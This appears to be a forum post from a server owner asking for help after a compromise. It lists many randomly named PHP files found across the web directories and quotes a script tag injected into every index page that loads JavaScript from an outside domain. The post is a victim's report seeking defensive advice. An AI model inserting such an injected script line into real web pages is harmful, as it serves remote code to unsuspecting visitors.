So apparently my Server kinda got hacked. I don't think that someone got access to the root user or any other user but in every main directory of the www-data user there were a lot of weird files.
Files like these:
09pr830b.php 52uhp5j9.php 9hjbz7xu.php bdeaduyl.php hhj7on2v.php jm7n1zdf.php lw3lv13h.php nzj3wf6h.php r5qp67kw.php x6ehtntu.php 0y9gi471.php 5536w191.php 9vmwh7aa.php e2papru4.php hzmnb75x.php jme7u409.php orc8p82a.php ra14sbdz.php uis5zhq2.php xnqcqm3d.php 158d9hzv.php 5k2x6uh1.php c15b02bz.php e6ykc6n0.php i1sc5ikc.php jn76fivm.php mb3w53e9.php ox26z4hn.php rcwj3dkx.php umhzgkbh.php xoodj3hs.php 2b1vzzo7.php 5mzdj4r3.php a7kwdelx.php c9shlse9.php eak7qcei.php i9f2cyhu.php jp62feoo.php mcp2njev.php p0dfud9d.php xs2g1nc8.php 2d0x8ec5.php 6s88dqcm.php a9tqjna5.php c9tfpu8d.php ed17zccq.php iahr5b8k.php jrtaolcc.php p0ntclmm.php xtlog640.php 2gqt4ol7.php 6s89iw0b.php en539hql.php igtvj6vh.php ko3l8s4u.php picg4k2r.php rk2yi0zl.php utajrsov.php yc5w8otp.php 2lh94d56.php 71zw0l85.php cn7d5i9a.php eok7yfj2.php kps5qctg.php prvpb4vg.php veceocp0.php z0yyxgtw.php 2wvhyz4c.php 79vq53ml.php apv62qn8.php co8c22wm.php f7yo0qfw.php kpu3xi71.php mwksuipa.php ptu6md0l.php sg6sk7we.php vg6mqofk.php z25w3zq9.php 3axgnqdb.php 7e0249wk.php cpy4xvrl.php fyospouz.php j3u65l0i.php kzikyhq5.php ndv1twur.php q4vs0pfe.php svmlp5n8.php vr71dbz8.php zjcinm40.php 3nkos6a4.php 7xka8fu3.php awrnmp7p.php cw6ibtrt.php g4oxsofs.php j706xx73.php l8j3k01f.php noldizm7.php q5l61p21.php t0ewh25s.php vzxso84f.php zssdhx3d.php 3w8veomm.php 8x6qv1tl.php aze5jtlk.php de9kfywx.php j9umstng.php q9oudc57.php u9s7v60e.php wi54c5sc.php 470dae43.php 902deir8.php b4aogx06.php gk9moupj.php jeet447u.php npm72nuo.php qbd1c67k.php uar9q55s.php wn17yctf.php 4uwk3yz6.php 90kpxfeq.php dq7tefm3.php jepw041c.php lv8r524n.php ntnl0am3.php qvgy3407.php ucwog9rb.php
There are a couple of wordpress instances in each webspace. But even in the webspaces where there wasn't a wordpress instance installed those files were there...
Also the beginning of every index.html or index.php there was always an entry like this:
script type='text/javascript' src='https://snippet.adsformarket.com/same.js'>
I don't know if that were 2 seperate hacks or just a single one but i really would like to know what mistakes i could have been making that this was happening.
Hope someone can help me here.
